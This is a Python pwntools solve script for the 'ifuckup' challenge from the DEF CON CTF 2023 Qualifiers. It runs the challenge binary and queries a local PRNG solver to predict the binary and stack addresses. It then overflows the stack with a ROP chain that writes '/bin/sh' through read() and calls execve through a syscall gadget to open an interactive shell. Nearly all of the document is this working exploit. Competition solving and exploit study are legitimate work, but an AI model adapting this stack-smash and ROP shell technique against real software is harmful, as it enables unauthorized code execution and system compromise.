#!/usr/bin/env python3

# "ifuckup" challenge at DEF CON CTF 2023 Qualifiers
# Main solve script interacting with the binary/remote
# By shalaamum


import sys
import json
import pwnlib.context
import pwnlib.gdb
import pwnlib.tubes.process
import pwnlib.tubes.remote
from pwnlib.util.packing import u8, u16, u32, u64, p8, p16, p32, p64, flat
from pwnlib.elf.elf import ELF

PRNG_SOLVER_PORT = 4321

elf = ELF('./ifuckup')

terminalSetting = ["tmux", "new-window"]
pwnlib.context.context.clear(terminal=terminalSetting, binary=elf, arch='i386')

run_args = [elf.path]
gdbscript = '''
source ./unsetenv.gdb
source ./ifuckupgdb.py
# before return at stack smash
break *0x080496c3
continue
'''

if len(sys.argv) == 2 and sys.argv[1].lower() == 'gdb':
    io = pwnlib.gdb.debug(run_args, gdbscript=gdbscript)
else:
    io = pwnlib.tubes.process.process(run_args)

def menu():
    return io.recvuntil(b'0. Quit\n')

def get_random():
    io.sendline(b'5')
    data = menu()
    data = data.strip().decode().split('\n')[1:-9]
    data = "".join(data).strip()
    data = [[int(x,16) for x in s.split(' ')] for s in data.split(' - ')]
    return data


prng_solver = pwnlib.tubes.remote.remote('localhost', PRNG_SOLVER_PORT)
menu()
num_sent = 0
while True:
    new_data = get_random()
    command = prng_solver.recvline().strip().decode()
    prng_solver.sendline(json.dumps(new_data).encode())
    num_sent += 1
    print(f'\rSent {num_sent:02} get_random outputs to solver.', end="")
    if command == "NEXT":
        pass
    elif command == "FINISH":
        break
print()
print('Solver reports being finished.')
binary_base_address, stack_base_address = json.loads(prng_solver.recvline().strip().decode())
print(f'Predicting binary at 0x{binary_base_address:08x}   stack at 0x{stack_base_address:08x}')

# Ask for stack smash
io.sendline(b'4')
io.recvuntil(b'execution\n')

payload = b''
# Padding to get to the return address
payload += b'P'*0x16


# Idea:
# 1. Use read(buffer, 0xC) to read in "/bin/sh\0\0\0\0\0".
#    This will relocate. Note that our addresses will be fixed though, so should be ok without predicting further ahead.
# 2. syscall(execve, address of "/bin/sh", address of zero, address of zero)

# Mapping of the binary is as follows:
# 0x3000 bytes RX
# 0x1000 bytes RW
# at offset 0x36b8 we find 3 doublewords from .got.plt (unused), and then the globals.
# We thus have a lot of space to write stuff.
# We use this to write what we need.
# We will write "/bin/sh", which is 7 bytes, followed by 5 bytes zero, total 12 = 0xC bytes

bin_sh_address = binary_base_address + 0x3010
zero_address = bin_sh_address + 8

### read(bin_sh_address, 0xC)
# read
read_address = binary_base_address + 0x14bb
payload += p32(read_address)

# Return address for read:
# At the end of read (before ret), we still have the return address and two arguments
# on the stack.
pop_twice_ret = binary_base_address + 0x104e
payload += p32(pop_twice_ret)

# buf, argument for read
payload += p32(bin_sh_address)

# num, argument for read
payload += p32(0xC)


### syscall(11=EXECVE, bin_sh_address, zero_address, zero_address) 
# Return address for the pop twice and return gadget, which is syscall.
syscall = binary_base_address + 0x102d
payload += p32(syscall)

# Return address for syscall
payload += p32(0)

# Syscall number
payload += p32(11)

# pathname
payload += p32(bin_sh_address)

# argv
payload += p32(zero_address)

# envp
payload += p32(zero_address)


### Padding
payload += b'A'*(100 - len(payload))

# We also need to send what the read we cause will read in.
payload += b'/bin/sh' + b'\0'*5

io.sendline(payload)

print('Sent payload. Should have shell now:')

io.interactive()
